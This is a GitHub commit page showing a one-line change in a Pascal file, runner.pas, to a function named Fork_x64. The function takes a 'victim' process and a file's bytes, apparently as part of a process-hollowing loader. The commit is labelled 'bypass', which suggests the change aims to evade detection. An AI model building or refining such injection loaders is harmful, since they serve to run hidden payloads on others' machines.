Skip to content

Commit 8e2f159

Browse files
authored
#1 - bypass
1 parent d864ef3 commit 8e2f159

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

Lib/runner.pas

+1-1
Original file line numberDiff line numberDiff line change
@@ -173,7 +173,7 @@ function Fork_x64(sVictim:string; bFile:TByteArray;var threadhandle:thandle):Boo
173173
begin
174174

175175
CONT := PCONTEXT(VirtualAlloc(nil, sizeof(CONT), MEM_COMMIT, PAGE_READWRITE));
176-
CONT.ContextFlags := CONTEXT_FULL;
176+
CONT.ContextFlags := CONTEXT_ALL;
177177

178178
if GetThreadContext(PI.hThread, CONT^) then
179179
begin

0 commit comments

Comments
 (0)